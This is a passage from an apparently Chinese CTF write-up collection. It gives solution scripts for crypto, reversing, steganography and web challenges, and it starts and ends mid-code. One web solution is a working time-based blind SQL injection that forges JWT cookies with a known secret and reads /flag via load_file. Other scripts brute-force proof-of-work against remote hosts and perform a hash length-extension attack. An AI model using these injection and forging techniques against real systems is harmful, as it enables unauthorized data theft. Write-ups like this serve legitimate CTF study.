ciphertext[i] = ciphertext[i] ^ tmp
ciphertext = bytes(ciphertext)
return ciphertext
for r in range(2,251):
for key in range(1,256):
m = flag
c = encrypt(m, key)
if(c in cc):
print(r)
print(key)
print(c)
print(cc.index(c))
r=187
key=34
pos=247
mm=decrypt(cc[247:],key)
print(mm)
</code></pre>
<h2 id="晋升之路"><a class="header" href="#晋升之路">晋升之路</a></h2>
<pre><code class="language-python">###################Solution
import requests
import time
import json
import hmac
import hashlib
import base64
import urllib
header = {
"alg": "SHA256",
"typ": "JWT",
}
secret_key = 'keyfe7dc29e5e3d3f066e5a8a15ba135259'
def b64_encode(s):
return base64.b64encode(s)
def b64_decode(s):
return base64.b64decode(s)
def encode_(secret, header, payload):
header_json = json.dumps(header,separators=(',', ':'), sort_keys=True)
segments = []
segments.append(b64_encode(header_json))
segments.append(b64_encode(payload))
msg = '.'.join(segments)
hm = hmac.new(secret, msg, digestmod=hashlib.sha256)
hm_base64 = b64_encode(hm.digest())
segments.append(hm_base64)
token = '.'.join(segments)
return token
def change(source):
to=''
for c in source:
to+='\u00'+hex(ord(c))[2:]
return to
headers={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'}
url='http://eci-2ze1tsbvbckimbhvrqqu.cloudeci1.ichunqiu.com:80/'
flag=''
for i in range(1,50):
left=33
right=128
while right-left!=1:
mid=(left+right)/2
payload="'^(substr((select/**/binary/**/load_file(0x2f666c6167)),{i},1)&gt;binary/**/{mid})/**/and/**/sleep(2)^'".format(i=i,mid=hex(mid))
data='{"data":"0'+change(payload)+'"}'
cookies={
'BestScore':urllib.quote(encode_(secret_key,header,data)),
'CellState':'eyJhbGciOiJTSEEyNTYiLCJ0eXAiOiJKV1QifQ%3D%3D.eyJkYXRhIjoie1wic2NvcmVcIjozNixcImdyaWRcIjp7XCJzaXplXCI6NCxcImNlbGxzXCI6W1t7XCJwb3NpdGlvblwiOntcInJvd1wiOjAsXCJjb2x1bW5cIjowfSxcInZhbHVlXCI6XCJQMlwifSx7XCJwb3NpdGlvblwiOntcInJvd1wiOjAsXCJjb2x1bW5cIjoxfSxcInZhbHVlXCI6XCJQMVwifSx7XCJwb3NpdGlvblwiOntcInJvd1wiOjAsXCJjb2x1bW5cIjoyfSxcInZhbHVlXCI6XCJQMVwifSx7XCJwb3NpdGlvblwiOntcInJvd1wiOjAsXCJjb2x1bW5cIjozfSxcInZhbHVlXCI6XCJQMlwifV0sW3tcInBvc2l0aW9uXCI6e1wicm93XCI6MSxcImNvbHVtblwiOjB9LFwidmFsdWVcIjpcIlAzXCJ9LHtcInBvc2l0aW9uXCI6e1wicm93XCI6MSxcImNvbHVtblwiOjF9LFwidmFsdWVcIjpcIlAyXCJ9LHtcInBvc2l0aW9uXCI6e1wicm93XCI6MSxcImNvbHVtblwiOjJ9LFwidmFsdWVcIjpcIlAyXCJ9LHtcInBvc2l0aW9uXCI6e1wicm93XCI6MSxcImNvbHVtblwiOjN9LFwidmFsdWVcIjpcIlAxXCJ9XSxbe1wicG9zaXRpb25cIjp7XCJyb3dcIjoyLFwiY29sdW1uXCI6MH0sXCJ2YWx1ZVwiOlwiUDJcIn0se1wicG9zaXRpb25cIjp7XCJyb3dcIjoyLFwiY29sdW1uXCI6MX0sXCJ2YWx1ZVwiOlwiUDNcIn0se1wicG9zaXRpb25cIjp7XCJyb3dcIjoyLFwiY29sdW1uXCI6Mn0sXCJ2YWx1ZVwiOlwiUDNcIn0se1wicG9zaXRpb25cIjp7XCJyb3dcIjoyLFwiY29sdW1uXCI6M30sXCJ2YWx1ZVwiOlwiUDJcIn1dLFt7XCJwb3NpdGlvblwiOntcInJvd1wiOjMsXCJjb2x1bW5cIjowfSxcInZhbHVlXCI6XCJQMVwifSx7XCJwb3NpdGlvblwiOntcInJvd1wiOjMsXCJjb2x1bW5cIjoxfSxcInZhbHVlXCI6XCJQMlwifSx7XCJwb3NpdGlvblwiOntcInJvd1wiOjMsXCJjb2x1bW5cIjoyfSxcInZhbHVlXCI6XCJQMlwifSx7XCJwb3NpdGlvblwiOntcInJvd1wiOjMsXCJjb2x1bW5cIjozfSxcInZhbHVlXCI6XCJQM1wifV1dfX0ifQ%3D%3D.N5Z2xi2%2F64lMHNC81TDUZUS2EIlizpCNcFG3p78WOAQ%3D'
}
mid=(left+right)/2
t1=time.time()
requests.get(url,headers=headers,cookies=cookies)
t2=time.time()
if t2-t1 &gt;1:
left=mid
else:
right=mid
print left,right
flag+=chr(right)
print flag
#python2 jinsheng.py
</code></pre>
<h2 id="wuhen"><a class="header" href="#wuhen">WuHen</a></h2>
<p>分析程序主动去触发divzero异常说明有东西隐藏在异常。通过seh去找
start() -&gt; scrt_common_main_seh() -&gt; initterm((_PVFV *)&amp;First, (_PVFV *)&amp;Last); -&gt; 进到First -&gt; sub_7FF781AC1000 -&gt; 7FF781AC2390
发现这里是一个DES算法。rand()是固定</p>
<pre><code class="language-bash">else if ( *(_QWORD *)(v2 + 16) == ptrMessageBoxTimeOutA )
{
v8 = 0;
*(_QWORD *)(a1[1] + 72) = 0i64;
qmemcpy(S1, "鏷-%嫋", 8);
*(_DWORD *)&amp;S1[12] = 0xD8A5EDAC;
*(_DWORD *)&amp;S1[16] = 0x23E71CCB;
*(_DWORD *)&amp;S1[20] = 0x169DDCDA;
*(_DWORD *)&amp;S1[24] = 0x2DFE7A0;
*(_DWORD *)&amp;S1[28] = 0x40CA83C; // 8CCCBEB06422E7682D258B96ACEDA5D8CB1CE723DADC9D16A0E7DF023CA80C04
KEY[0] = rand();
KEY[1] = rand();
KEY[2] = rand();
KEY[3] = rand();
KEY[4] = rand();
KEY[5] = rand();
KEY[6] = rand();
KEY[7] = rand();
ka = *(_QWORD *)KEY; // 2923BE84E16CD6AE
for ( i = 0i64; i != 32; i += 8i64 )
*(_QWORD *)&amp;In1[i] = Des(*(_QWORD *)&amp;In1[i], ka);
for ( j = 0i64; j != 32; ++j )
{
if ( In1[j] != S1[j] )
break;
++v8;
}
if ( v8 == 32 )
*(_QWORD *)(a1[1] + 136) = qword_7FF781AE2C10;
return 0xFFFFFFFFi64;
}
</code></pre>
<p>经过超级长的时间调试找到魔改点在循环左移处改成了左移2而且这个是小端的传值都是反向处理一下。</p>
<pre><code>for j in range(step):
t1 = d(tmp1) &lt;&lt; 2 &amp; 0xfffffff | d(tmp1) &gt;&gt; 26 &amp; 1
t2 = d(tmp2) &lt;&lt; 2 &amp; 0xfffffff | d(tmp2) &gt;&gt; 26 &amp; 1
</code></pre>
<pre><code class="language-python">==&gt; main.py &lt;==
from des import Decryption
key = bytes.fromhex('2923BE84E16CD6AE')[::-1]
enclist = '8CCCBEB06422E7682D258B96ACEDA5D8CB1CE723DADC9D16A0E7DF023CA80C04'
for i in range(0, 64, 16):
enc = bytes.fromhex(enclist[i:i + 16])[::-1]
res = Decryption(enc, key)
print(res[::-1].decode(),end='')
# fa7ac1027c833fb858dfff282c7443f0
==&gt; CreateSubkey.py &lt;==
MaxTime = 16
# 生成子密钥的置换表1将64位的密钥转换为56位
key_table1 = [57, 49, 41, 33, 25, 17, 9,
1, 58, 50, 42, 34, 26, 18,
10, 2, 59, 51, 43, 35, 27,
19, 11, 3, 60, 52, 44, 36,
63, 55, 47, 39, 31, 23, 15,
7, 62, 54, 46, 38, 30, 22,
14, 6, 61, 53, 45, 37, 29,
21, 13, 5, 28, 20, 12, 4]
# 生成子密钥的置换表2将56位的密钥转换为48位
key_table2 = [14, 17, 11, 24, 1, 5,
3, 28, 15, 6, 21, 10,
23, 19, 12, 4, 26, 8,
16, 7, 27, 20, 13, 2,
41, 52, 31, 37, 47, 55,
30, 40, 51, 45, 33, 48,
44, 49, 39, 56, 34, 53,
46, 42, 50, 36, 29, 32]
STEP_TABLE = [1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1]
d = lambda x: int(''.join(x), 2)
def Listmove(l, step): # 将列表中的元素循环左移
return l[step:] + l[:step]
def Subkey(key): # 生成子密钥
keyresult = []
key0 = [0 for i in range(56)]
for i in range(len(key_table1)):
key0[i] = key[key_table1[i] - 1]
# 生成16个密钥
for i in range(MaxTime):
key1 = [0 for i in range(48)]
# 确定每次左移的步数
step = STEP_TABLE[i]
# if (i == 0 or i == 1 or i == 8 or i == 15):
# step = 1
# else:
# step = 2
# 分成两组
tmp1 = key0[0:28]
tmp2 = key0[28:56]
# print(f'round: {i},', hex(int(''.join(tmp1), 2)), hex(int(''.join(tmp2), 2)))
# 循环左移
# tmp1 = Listmove(tmp1, step)
# tmp2 = Listmove(tmp2, step)
for j in range(step):
t1 = d(tmp1) &lt;&lt; 2 &amp; 0xfffffff | d(tmp1) &gt;&gt; 26 &amp; 1
t2 = d(tmp2) &lt;&lt; 2 &amp; 0xfffffff | d(tmp2) &gt;&gt; 26 &amp; 1
tmp1 = list(f'{t1:028b}')
tmp2 = list(f'{t2:028b}')
# tmp1 = Listmove(tmp1, step*2)
# tmp2 = Listmove(tmp2, step*2)
# 左右连接
key0 = tmp1 + tmp2
# 置换选择
for j in range(len(key_table2)):
key1[j] = key0[key_table2[j] - 1]
# 生成密钥
# log(i, key1, tmp1, tmp2)
keyresult.append(key1)
# 返回的是一个集合包含了每次的密钥
return keyresult
def log(i, key1, tmp1, tmp2):
s = int(''.join(tmp1), 2)
hex1 =int(''.join(tmp2), 2)
hex2 = int(''.join(key1), 2)
print(f'round: {i:02}, {s:08X} {hex1:08X} {hex2:016X}')
==&gt; des.py &lt;==
import CreateSubkey as cs
import F_function as f
# 十六进制转二进制比特串
Hex2bin = lambda m: [val for x in list(m) for val in f"{x:08b}"]
# 二进制比特串转十六进制
bin2Hex = lambda txt: bytes([int(''.join(txt[i:i + 8]), 2) for i in range(0, 64, 8)])
# 按照DES算法的流程图进行运算
def Encryption(plaintext, key):
text = Hex2bin(plaintext)
keybit = Hex2bin(key)
keylist = cs.Subkey(keybit)
text1 = f.IP(text, 0) # IP置换
L = text1[:32]
R = text1[32:64]
for i in range(16):
tmp = R
tmp = f.Extend(tmp)
tmp = f.Xor(tmp, keylist[i])
# print('xor:', hex(int(''.join(tmp), 2)))
tmp = f.S_replace(tmp)
# print('S:', hex(int(''.join(tmp), 2)))
tmp = f.P_replace(tmp)
# print('P:', hex(int(''.join(tmp), 2)))
tmp = f.Xor(tmp, L)
# print('pres ^ L:', hex(int(''.join(tmp), 2)))
L = R
R = tmp
L, R = R, L
ctext = L
ctext.extend(R)
ctext = f.IP(ctext, 1)
return bin2Hex(ctext)
def Decryption(ptext, key):
text = Hex2bin(ptext)
keybit = Hex2bin(key)
keylist = cs.Subkey(keybit)
text1 = f.IP(text, 0) # IP置换
L = [text1[i] for i in range(32)]
R = [text1[i] for i in range(32, 64)]
for i in range(16):
tmp = R
tmp = f.Extend(tmp)
tmp = f.Xor(tmp, keylist[15 - i])
tmp = f.S_replace(tmp)
tmp = f.P_replace(tmp)
tmp = f.Xor(tmp, L)
L = R
R = tmp
L, R = R, L
ctext = L
ctext.extend(R)
ctext = f.IP(ctext, 1)
return bin2Hex(ctext)
==&gt; F_function.py &lt;==
MaxTime = 16
# IP置换表 64Bytes
IP_table = [58, 50, 42, 34, 26, 18, 10, 2,
60, 52, 44, 36, 28, 20, 12, 4,
62, 54, 46, 38, 30, 22, 14, 6,
64, 56, 48, 40, 32, 24, 16, 8,
57, 49, 41, 33, 25, 17, 9, 1,
59, 51, 43, 35, 27, 19, 11, 3,
61, 53, 45, 37, 29, 21, 13, 5,
63, 55, 47, 39, 31, 23, 15, 7]
# 逆IP置换表 64 Bytes
Inv_IP_table = [40, 8, 48, 16, 56, 24, 64, 32,
39, 7, 47, 15, 55, 23, 63, 31,
38, 6, 46, 14, 54, 22, 62, 30,
37, 5, 45, 13, 53, 21, 61, 29,
36, 4, 44, 12, 52, 20, 60, 28,
35, 3, 43, 11, 51, 19, 59, 27,
34, 2, 42, 10, 50, 18, 58, 26,
33, 1, 41, 9, 49, 17, 57, 25]
# S盒 512 Bytes
# S盒中的S1盒 64Bytes
S1 = [14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7,
0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8,
4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0,
15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13]
# S盒中的S2盒
S2 = [15, 1, 8, 14, 6, 11, 3, 4, 9, 7, 2, 13, 12, 0, 5, 10,
3, 13, 4, 7, 15, 2, 8, 14, 12, 0, 1, 10, 6, 9, 11, 5,
0, 14, 7, 11, 10, 4, 13, 1, 5, 8, 12, 6, 9, 3, 2, 15,
13, 8, 10, 1, 3, 15, 4, 2, 11, 6, 7, 12, 0, 5, 14, 9]
# S盒中的S3盒
S3 = [10, 0, 9, 14, 6, 3, 15, 5, 1, 13, 12, 7, 11, 4, 2, 8,
13, 7, 0, 9, 3, 4, 6, 10, 2, 8, 5, 14, 12, 11, 15, 1,
13, 6, 4, 9, 8, 15, 3, 0, 11, 1, 2, 12, 5, 10, 14, 7,
1, 10, 13, 0, 6, 9, 8, 7, 4, 15, 14, 3, 11, 5, 2, 12]
# S盒中的S4盒
S4 = [7, 13, 14, 3, 0, 6, 9, 10, 1, 2, 8, 5, 11, 12, 4, 15,
13, 8, 11, 5, 6, 15, 0, 3, 4, 7, 2, 12, 1, 10, 14, 9,
10, 6, 9, 0, 12, 11, 7, 13, 15, 1, 3, 14, 5, 2, 8, 4,
3, 15, 0, 6, 10, 1, 13, 8, 9, 4, 5, 11, 12, 7, 2, 14]
# S盒中的S5盒
S5 = [2, 12, 4, 1, 7, 10, 11, 6, 8, 5, 3, 15, 13, 0, 14, 9,
14, 11, 2, 12, 4, 7, 13, 1, 5, 0, 15, 10, 3, 9, 8, 6,
4, 2, 1, 11, 10, 13, 7, 8, 15, 9, 12, 5, 6, 3, 0, 14,
11, 8, 12, 7, 1, 14, 2, 13, 6, 15, 0, 9, 10, 4, 5, 3]
# S盒中的S6盒
S6 = [12, 1, 10, 15, 9, 2, 6, 8, 0, 13, 3, 4, 14, 7, 5, 11,
10, 15, 4, 2, 7, 12, 9, 5, 6, 1, 13, 14, 0, 11, 3, 8,
9, 14, 15, 5, 2, 8, 12, 3, 7, 0, 4, 10, 1, 13, 11, 6,
4, 3, 2, 12, 9, 5, 15, 10, 11, 14, 1, 7, 6, 0, 8, 13]
# S盒中的S7盒
S7 = [4, 11, 2, 14, 15, 0, 8, 13, 3, 12, 9, 7, 5, 10, 6, 1,
13, 0, 11, 7, 4, 9, 1, 10, 14, 3, 5, 12, 2, 15, 8, 6,
1, 4, 11, 13, 12, 3, 7, 14, 10, 15, 6, 8, 0, 5, 9, 2,
6, 11, 13, 8, 1, 4, 10, 7, 9, 5, 0, 15, 14, 2, 3, 12]
# S盒中的S8盒
S8 = [13, 2, 8, 4, 6, 15, 11, 1, 10, 9, 3, 14, 5, 0, 12, 7,
1, 15, 13, 8, 10, 3, 7, 4, 12, 5, 6, 11, 0, 14, 9, 2,
7, 11, 4, 1, 9, 12, 14, 2, 0, 6, 10, 13, 15, 3, 5, 8,
2, 1, 14, 7, 4, 10, 8, 13, 15, 12, 9, 0, 3, 5, 6, 11]
# S盒 512 Bytes
S = [S1, S2, S3, S4, S5, S6, S7, S8]
# 用于对数据进行扩展置换将32bit数据扩展为48bit
extend_table = [32, 1, 2, 3, 4, 5,
4, 5, 6, 7, 8, 9,
8, 9, 10, 11, 12, 13,
12, 13, 14, 15, 16, 17,
16, 17, 18, 19, 20, 21,
20, 21, 22, 23, 24, 25,
24, 25, 26, 27, 28, 29,
28, 29, 30, 31, 32, 1]
# P盒 32 Bytes
P_table = [16, 7, 20, 21, 29, 12, 28, 17,
1, 15, 23, 26, 5, 18, 31, 10,
2, 8, 24, 14, 32, 27, 3, 9,
19, 13, 30, 6, 22, 11, 4, 25]
def int2bit(n): # 0~15整数转比特
a = []
for i in range(0, 4):
a.insert(0, str(n % 2))
n = int(n / 2)
return a
# IP置换部分op为0表示正置换op为1表示逆置换
def IP(text, op):
tmp = [0 for i in range(64)]
if op == 0:
for i in range(64):
tmp[i] = text[IP_table[i] - 1]
return tmp
if op == 1:
for i in range(64):
tmp[i] = text[Inv_IP_table[i] - 1]
return tmp
# 进行扩展将32位扩展为48位
def Extend(text):
extend = [0 for i in range(48)]
for i in range(48):
extend[i] = text[extend_table[i] - 1]
return extend
# S盒变换部分
def S_replace(text):
Sresult = [0 for k in range(32)]
for k in range(8):
row = 2 * int(text[k * 6]) + int(text[k * 6 + 5])
column = 8 * int(text[k * 6 + 1]) + 4 * int(text[k * 6 + 2]) + 2 * int(text[k * 6 + 3]) + int(text[k * 6 + 4])
tmp = S[k][row * 16 + column]
for i in range(4):
Sresult[4 * k + i] = int2bit(tmp)[i]
return Sresult
# P置换部分
def P_replace(text):
Presult = [0 for i in range(32)]
for i in range(32):
Presult[i] = text[P_table[i] - 1]
return Presult
# 异或运算
def Xor(bit1, bit2):
Xorresult = [0 for i in range(len(bit1))]
for i in range(len(bit1)):
Xorresult[i] = str(int(bit1[i]) ^ int(bit2[i]))
return Xorresult
</code></pre>
<h2 id="two-old-man"><a class="header" href="#two-old-man">two old man</a></h2>
<pre><code class="language-python">#***Task
from Crypto.Util.number import getPrime, bytes_to_long
from gmpy2 import next_prime
from os import urandom
p = getPrime(512)
q = next_prime(p)
f = open('flag.txt', 'rb')
flag = bytes_to_long(f.read() + urandom(80))
f.close()
n = p * q
noise = 1
for i in range(1, p):
noise = (noise * i) % n
e = 65537
m = noise * flag % n
c = pow(m, e, n)
f = open('cipher.txt', 'w')
f.write(f'n = {n}\n')
f.write(f'c = {c}\n')
f.close()
# n = 85300075344029411815824595503988243445862905766678219075505308650733618833670564881852727486124268400610986787128098448019033364495139613324970241727110931819892696714818851281415775513570277910383275087114654129682377412912019832281317957560043184535419626656895668221654944747681971549122289940681069900407
# c = 9573652589542765552302771253681350397003834739308979745013100413124314842798363931809688570564520116621700487372591176287735200842509675988724251662626729985842786542792501720096155870937426730816107184806453412679852267311433564241907769415712680798333238722253896962273334726781549003053182286964079196169
#***Solution
# -*- coding: utf-8 -*-
from Crypto.Util.number import long_to_bytes, isPrime
from gmpy2 import invert, powmod
from libnum import solve_crt
from functools import reduce
n = 85300075344029411815824595503988243445862905766678219075505308650733618833670564881852727486124268400610986787128098448019033364495139613324970241727110931819892696714818851281415775513570277910383275087114654129682377412912019832281317957560043184535419626656895668221654944747681971549122289940681069900407
c = 9573652589542765552302771253681350397003834739308979745013100413124314842798363931809688570564520116621700487372591176287735200842509675988724251662626729985842786542792501720096155870937426730816107184806453412679852267311433564241907769415712680798333238722253896962273334726781549003053182286964079196169
e = 65537
p = 9235803990126112015712488678718763955409551939176855113164196792808741000738495903574101715848666926223811357608313697206174389466866723210464201625526487
q = 9235803990126112015712488678718763955409551939176855113164196792808741000738495903574101715848666926223811357608313697206174389466866723210464201625528161
d = invert(e, (p-1)*(q-1))
assert p*q == n
m = pow(c, d, n)
d1 = invert(p-1, p)
print(f'd1 = {d1}')
m1 = m * d1 % p
print(f'm1 = {m1}')
s = reduce(lambda x,y: x * y % n, range(p, q), 1)
d2 = invert(s, q)
s = d2 * (q - 1) % q
d2 = invert(s, q)
print(f'd2 = {d2}')
m2 = m * d2 % q
print(f'm2 = {m2}')
m = solve_crt((m1, m2), (p, q))
print(long_to_bytes(m)[:-80])
b'flag{c7cfdbc1-729b-de11-239f-a473ec0637b8}'
</code></pre>
<h2 id="tupian"><a class="header" href="#tupian">tupian</a></h2>
<pre><code class="language-bash">open Stegsolve open gif imge
Analyse-&gt;frame browser
convert new_gif.gif -coalesce xx_%05d.png
Y2F0Y2hfdGhlX2R5bmFtaWNfZmxhZ19pc19xdW10ZV9zaW1wbGU=
base64_text -d Y2F0Y2hfdGhlX2R5bmFtaWNfZmxhZ19pc19xdW10ZV9zaW1wbGU=
catch_the_dynamic_flag_is_qumte_simple
</code></pre>
<h2 id="train"><a class="header" href="#train">Train</a></h2>
<p>task.py</p>
<pre><code class="language-python">from Crypto.Util.number import*
from hashlib import sha256
import socketserver
import signal
import string
import random
from secret import flag
banner = br'''
.oooooo..o oooo oooo ooooooooooooo o8o
d8P' `Y8 `888 `888 8' 888 `8 `"'
Y88bo. ooo. .oo. .oo. .oooo. 888 888 888 oooo d8b .oooo. oooo ooo. .oo.
`"Y8888o. `888P"Y88bP"Y88b `P )88b 888 888 888 `888""8P `P )88b `888 `888P"Y88b
`"Y88b 888 888 888 .oP"888 888 888 888 888 .oP"888 888 888 888
oo .d8P 888 888 888 d8( 888 888 888 888 888 d8( 888 888 888 888
8""88888P' o888o o888o o888o `Y888""8o o888o o888o o888o d888b `Y888""8o o888o o888o o888o
'''
n0 = 30798082519452208630254982405300548841337042015746308462162479889627080155514391987610153873334549377764946092629701
g = 64146569863628228208271069055817252751116365290967978172021890038925428672043
def TrainHash(msg):
n = n0
msg = map(ord,msg)
for i in msg :
n = g * (n+i)
n = n &amp; (1&lt;&lt;383)
return n - 0xf5e33dabb114514
table = string.ascii_letters+string.digits
MENU = br'''
&lt;OPTION&gt;
'''
class Task(socketserver.BaseRequestHandler):
def _recvall(self):
BUFF_SIZE = 2048
data = b''
while True:
part = self.request.recv(BUFF_SIZE)
data += part
if len(part) &lt; BUFF_SIZE:
break
return data.strip()
def send(self, msg, newline=True):
try:
if newline:
msg += b'\n'
self.request.sendall(msg)
except:
pass
def recv(self, prompt=b'SERVER &lt;INPUT&gt;: '):
self.send(prompt, newline=False)
return self._recvall()
def proof_of_work(self):
proof = (''.join([random.choice(table)for _ in range(20)])).encode()
sha = sha256(proof).hexdigest().encode()
self.send(b"[+] sha256(XXXX+" + proof[4:] + b") == " + sha )
XXXX = self.recv(prompt = b'[+] Plz Tell Me XXXX :')
if len(XXXX) != 4 or sha256(XXXX + proof[4:]).hexdigest().encode() != sha:
return False
return sha.decode()
def handle(self):
signal.alarm(30)
FirstBlockHash = self.proof_of_work()
if not FirstBlockHash:
self.request.close()
self.send(banner)
self.send(b"\nPlease give me 2 strings that are same when are hashed =.= ")
string1 = self.recv().decode()
string2 = self.recv().decode()
if TrainHash(string1) == TrainHash(string2):
self.send(b'\nJust do it!~ You can do more!')
if string2.encode()[-50:] == string1.encode()[-50:]:
self.send(flag)
self.send(b"\nConnection has been closed =.= ")
self.request.close()
class ThreadedServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
class ForkedServer(socketserver.ForkingMixIn, socketserver.TCPServer):
pass
if __name__ == "__main__":
HOST, PORT = '0.0.0.0', 10012
print("HOST:POST " + HOST+":" + str(PORT))
server = ForkedServer((HOST, PORT), Task)
server.allow_reuse_address = True
server.serve_forever()
</code></pre>
<p>exp.py</p>
<pre><code class="language-python">from pwn import *
import string
import hashlib
table = string.ascii_letters + string.digits
re = remote('39.106.48.123',29929)
re.recvuntil(b'[+] sha256(XXXX+')
x = re.recv(16)
re.recvuntil(b') == ')
y = re.recv(64)
flag = 0
for a in table:
if flag:break
for b in table:
if flag: break
for c in table:
if flag: break
for d in table:
z = (a + b + c + d).encode()
if hashlib.sha256(z + x).hexdigest() == y.decode():
flag = 1
re.recv()
re.sendline(z)
break
re.recvuntil(b'SERVER &lt;INPUT&gt;: ')
re.sendline(b'a')
re.recvuntil(b'SERVER &lt;INPUT&gt;: ')
re.sendline(b'a')
re.interactive()
if hashlib.sha256(z + x).hexdigest() == y.decode():
flag = 1
re.recv()
re.sendline(z)
re.recvuntil(b'SERVER &lt;INPUT&gt;: ')
re.sendline(b'a')
re.recvuntil(b'SERVER &lt;INPUT&gt;: ')
re.sendline(b'a')
re.interactive()
</code></pre>
<h2 id="trainplus"><a class="header" href="#trainplus">TrainPlus</a></h2>
<p>exp.py</p>
<pre><code class="language-python">'''
给出了一个16字节随机生成的一个字符串,已知量。并且使用自己的MD00PLUS去对sec进行一次哈希,
发现需要给出一个消息 以及sec+这个消息 能够让我们预测到这块的哈希是多少
首先我们得看一下MD00Plus这个函数,我们发现他其实跟正常的MD5不一样,而改变的地方就是一开始的padding部分
那么其实如果了解哈希长度攻击的很快就能发现只要给出这样的就可以成功。
'''
def Md00Plus(message: bytes):
h0 = 0x114514ab
h1 = 0x1919810a
h2 = 0xa0189191
h3 = 0xba415411
R = (7, 12, 17, 22) * 4 + (5, 9, 14, 20) * 4 + (4, 11, 16, 23) * 4 + (6, 10, 15, 21) * 4
K = (0xd76aa478, 0xe8c7b756, 0x242070db, 0xc1bdceee,
0xf57c0faf, 0x4787c62a, 0xa8304613, 0xfd469501, 0x698098d8,
0x8b44f7af, 0xffff5bb1, 0x895cd7be, 0x6b901122, 0xfd987193,
0xa679438e, 0x49b40821, 0xf61e2562, 0xc040b340, 0x265e5a51,
0xe9b6c7aa, 0xd62f105d, 0x02441453, 0xd8a1e681, 0xe7d3fbc8,
0x21e1cde6, 0xc33707d6, 0xf4d50d87, 0x455a14ed, 0xa9e3e905,
0xfcefa3f8, 0x676f02d9, 0x8d2a4c8a, 0xfffa3942, 0x8771f681,
0x6d9d6122, 0xfde5380c, 0xa4beea44, 0x4bdecfa9, 0xf6bb4b60,
0xbebfbc70, 0x289b7ec6, 0xeaa127fa, 0xd4ef3085, 0x04881d05,
0xd9d4d039, 0xe6db99e5, 0x1fa27cf8, 0xc4ac5665, 0xf4292244,
0x432aff97, 0xab9423a7, 0xfc93a039, 0x655b59c3, 0x8f0ccc92,
0xffeff47d, 0x85845dd1, 0x6fa87e4f, 0xfe2ce6e0, 0xa3014314,
0x4e0811a1, 0xf7537e82, 0xbd3af235, 0x2ad7d2bb, 0xeb86d391)
F = lambda x, y, z: ((x &amp; y) | ((~x) &amp; z))
G = lambda x, y, z: ((x &amp; z) | (y &amp; (~z)))
H = lambda x, y, z: (x ^ y ^ z)
I = lambda x, y, z: (y ^ (x | (~z)))
L = lambda x, n: ((x &lt;&lt; n) | (x &gt;&gt; (32 - n))) &amp; 0xffffffff
W = lambda i4, i3, i2, i1: (i1 &lt;&lt; 24) | (i2 &lt;&lt; 16) | (i3 &lt;&lt; 8) | i4
reverse = lambda x: (x &lt;&lt; 24) &amp; 0xff000000 | (x &lt;&lt; 8) &amp; 0x00ff0000 | \
(x &gt;&gt; 8) &amp; 0x0000ff00 | (x &gt;&gt; 24) &amp; 0x000000ff
ascii_list = list(map(lambda x: x, message))
msg_length = len(ascii_list) * 8
ascii_list.append(128)
while (len(ascii_list) * 8 + 64) % 512 != 0:
ascii_list.append(1)
for i in range(8):
ascii_list.append((msg_length &gt;&gt; (8 * i)) &amp; 0xff)
for i in range(len(ascii_list) // 64):
a, b, c, d = h0, h1, h2, h3
for j in range(64):
if 0 &lt;= j &lt;= 15:
f = F(b, c, d) &amp; 0xffffffff
g = j
elif 16 &lt;= j &lt;= 31:
f = G(b, c, d) &amp; 0xffffffff
g = ((5 * j) + 1) % 16
elif 32 &lt;= j &lt;= 47:
f = H(b, c, d) &amp; 0xffffffff
g = ((3 * j) + 5) % 16
else:
f = I(b, c, d) &amp; 0xffffffff
g = (7 * j) % 16
aa, dd, cc = d, c, b
s = i * 64 + g * 4
w = W(ascii_list[s], ascii_list[s + 1], ascii_list[s + 2], ascii_list[s + 3])
bb = (L((a + f + K[j] + w) &amp; 0xffffffff, R[j]) + b) &amp; 0xffffffff
a, b, c, d = aa, bb, cc, dd
h0 = (h0 + a) &amp; 0xffffffff
h1 = (h1 + b) &amp; 0xffffffff
h2 = (h2 + c) &amp; 0xffffffff
h3 = (h3 + d) &amp; 0xffffffff
h0, h1, h2, h3 = reverse(h0), reverse(h1), reverse(h2), reverse(h3)
digest = (h0 &lt;&lt; 96) | (h1 &lt;&lt; 64) | (h2 &lt;&lt; 32) | h3
return hex(digest)[2:].rjust(32, '0'),ascii_list
def md5ex(hash,message: bytes):
reverse = lambda x: (x &lt;&lt; 24) &amp; 0xff000000 | (x &lt;&lt; 8) &amp; 0x00ff0000 | \
(x &gt;&gt; 8) &amp; 0x0000ff00 | (x &gt;&gt; 24) &amp; 0x000000ff
hash = int(hash,16)
h3 = reverse(hash&amp;0xffffffff)
hash &gt;&gt;= 32
h2 = reverse(hash&amp;0xffffffff)
hash &gt;&gt;= 32
h1 = reverse(hash&amp;0xffffffff)
hash &gt;&gt;= 32
h0 = reverse(hash&amp;0xffffffff)
R = (7, 12, 17, 22) * 4 + (5, 9, 14, 20) * 4 + (4, 11, 16, 23) * 4 + (6, 10, 15, 21) * 4
K = (0xd76aa478, 0xe8c7b756, 0x242070db, 0xc1bdceee,
0xf57c0faf, 0x4787c62a, 0xa8304613, 0xfd469501, 0x698098d8,
0x8b44f7af, 0xffff5bb1, 0x895cd7be, 0x6b901122, 0xfd987193,
0xa679438e, 0x49b40821, 0xf61e2562, 0xc040b340, 0x265e5a51,
0xe9b6c7aa, 0xd62f105d, 0x02441453, 0xd8a1e681, 0xe7d3fbc8,
0x21e1cde6, 0xc33707d6, 0xf4d50d87, 0x455a14ed, 0xa9e3e905,
0xfcefa3f8, 0x676f02d9, 0x8d2a4c8a, 0xfffa3942, 0x8771f681,
0x6d9d6122, 0xfde5380c, 0xa4beea44, 0x4bdecfa9, 0xf6bb4b60,
0xbebfbc70, 0x289b7ec6, 0xeaa127fa, 0xd4ef3085, 0x04881d05,
0xd9d4d039, 0xe6db99e5, 0x1fa27cf8, 0xc4ac5665, 0xf4292244,
0x432aff97, 0xab9423a7, 0xfc93a039, 0x655b59c3, 0x8f0ccc92,
0xffeff47d, 0x85845dd1, 0x6fa87e4f, 0xfe2ce6e0, 0xa3014314,
